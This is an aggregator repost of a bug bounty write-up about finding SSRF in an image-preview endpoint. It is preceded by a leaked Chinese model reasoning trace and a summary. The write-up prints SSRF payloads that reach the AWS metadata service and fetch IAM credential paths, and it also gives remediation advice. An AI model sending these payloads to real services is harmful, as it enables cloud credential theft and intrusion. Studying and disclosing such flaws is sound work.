好的,我现在需要帮用户总结这篇文章的内容,控制在100个字以内。首先,我得通读整篇文章,抓住主要信息。 文章讲的是一个安全研究人员发现了一个SSRF漏洞的过程。他通过测试一个图片上传功能,最终获取了AWS的内部元数据和凭证。接着,他详细描述了测试步骤、报告内容以及修复建议。最后,他还分享了对新手的建议。 接下来,我需要将这些要点浓缩到100字以内。重点包括SSRF漏洞、测试过程、获取敏感信息、报告和修复措施,以及对新手的提示。 可能会用到的关键词:SSRF漏洞、图片上传功能、AWS元数据、Burp工具、修复建议、安全测试。 现在组织语言,确保简洁明了,不使用任何开头词。例如:“文章描述了一次通过图片上传功能发现SSRF漏洞的经历,展示了如何利用该漏洞获取敏感信息,并提供了修复建议。” 这样大约在25字左右,但可能需要更详细一些。 再调整一下:“文章介绍了一次SSRF漏洞的发现过程:通过图片上传功能测试,成功获取AWS内部元数据和凭证,并给出了修复建议。” 这样大约40字左右。 或者更详细一点:“文章讲述了一位研究人员如何通过测试图片上传功能发现SSRF漏洞,并利用该漏洞获取AWS内部元数据和凭证的过程,并提供了修复建议。” 大约50字左右。 最后检查一下是否符合要求:100字以内,直接描述内容,不使用特定开头词。看起来没问题。 </think> 文章讲述了一位研究人员如何通过测试图片上传功能发现SSRF漏洞,并利用该漏洞获取AWS内部元数据和凭证的过程,并提供了修复建议。 2026-3-19 04:55:46 Author: infosecwriteups.com(查看原文) 阅读量:6 收藏
Press enter or click to view image in full size
A step-by-step bug bounty writeup that any beginner can learn from
I almost missed it.
It looked like a simple image upload feature. Nothing special. But 20 minutes later, I was reading internal AWS metadata from a server that wasn’t mine.
This is the story of how I found a critical Server-Side Request Forgery (SSRF) vulnerability — what I did, how I reported it, and what you can learn from it.
What Is SSRF? (Quick Explanation)
Before diving in, let me explain SSRF in plain English.
Imagine you ask a bank teller to go fetch a document for you. The teller goes into the back office — a place you can never enter — and brings it back. SSRF is exactly that. You trick a server into making requests on your behalf — to internal systems, cloud metadata endpoints, or even internal admin panels that are invisible to the outside world.
It’s dangerous because:
- It bypasses firewalls
- It can expose AWS/GCP/Azure cloud credentials
- In the worst case, it leads to full Remote Code Execution (RCE)
How I Found It
I was hunting on a private program on Bugcrowd. The target was a large SaaS company with a file management feature.
I noticed one specific endpoint:
POST /api/v1/fetch-preview
{"url": "https://example.com/image.jpg"}The application was fetching a URL server-side to generate a thumbnail preview. My eyes lit up.
Step 1 — Basic Test
I replaced the URL with my Burp Collaborator address:
{"url": "http://YOUR-COLLABORATOR-ID.burpcollaborator.net"}Within 2 seconds — a DNS ping hit my Collaborator. The server was making outbound requests. SSRF confirmed at basic level. ✅
Step 2 — Internal Network Probe
Next, I tried internal addresses:
{"url": "http://169.254.169.254/latest/meta-data/"}169.254.169.254 is the AWS Instance Metadata Service — a goldmine if accessible.
The response came back with:
ami-id
hostname
iam/
instance-id
instance-typeMy heart rate went up. I dug deeper:
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}Response:
EC2InstanceRoleOne more step:
{"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2InstanceRole"}And there it was — temporary AWS credentials:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "REDACTED",
"Token": "REDACTED",
"Expiration": "2026-XX-XXTXX:XX:XXZ"
}I immediately stopped. I had proof of concept. I did not use those credentials — that crosses the ethical line.
The Report I Submitted
A good bug bounty report has 5 parts:[blog.hackbynight]
Get Hacker MD’s stories in your inbox
Join Medium for free to get updates from this writer.
1. Title: Critical SSRF via /api/v1/fetch-preview — AWS IAM Credentials Exposed
2. Severity: Critical (CVSS 9.8)
3. Impact:
An attacker could use the exposed IAM credentials to access S3 buckets, read database snapshots, or potentially take over the entire AWS infrastructure.
4. Steps to Reproduce:
Exact curl command, request/response screenshots, Collaborator proof.
5. Remediation:
- Block requests to
169.254.169.254at firewall level - Implement a strict allowlist for outbound URLs
- Use IMDSv2 (token-based) instead of IMDSv1
The Result
The program triaged it as Critical within 6 hours.
The fix was deployed in 48 hours.
The bounty was paid. 💰
What You Can Learn From This
If you’re a beginner reading this, here are the 3 things I want you to take away:
1. Always test URL input fields.
Any feature that accepts a URL — image upload, webhook, PDF generator, link preview — is a potential SSRF entry point.
2. The metadata endpoint is your best friend.
http://169.254.169.254 on AWS, http://metadata.google.internal on GCP. Memorize these.
3. Stop at proof of concept.
You don’t need to dump the entire database to prove a critical bug. Show the impact clearly, stop there, and report it. Stay ethical. Always.
Tools I Used
- Burp Suite Professional — intercept and modify requests
- Burp Collaborator — detect out-of-band DNS/HTTP interactions
- curl — quick manual testing
- Nuclei — initial automated scanning
Final Thoughts
SSRF is one of the most underrated vulnerabilities in 2026. Most beginners skip URL parameters because they look boring.
Don’t be most beginners.
The boring-looking input field at 11 PM on a Tuesday is where the critical bugs hide.
Happy hunting. 🐛
Follow me on Medium for more real-world bug bounty writeups. I’m @HackerMD a cybersecurity researcher and bug bounty hunter from India.
如有侵权请联系:admin#unsafe.sh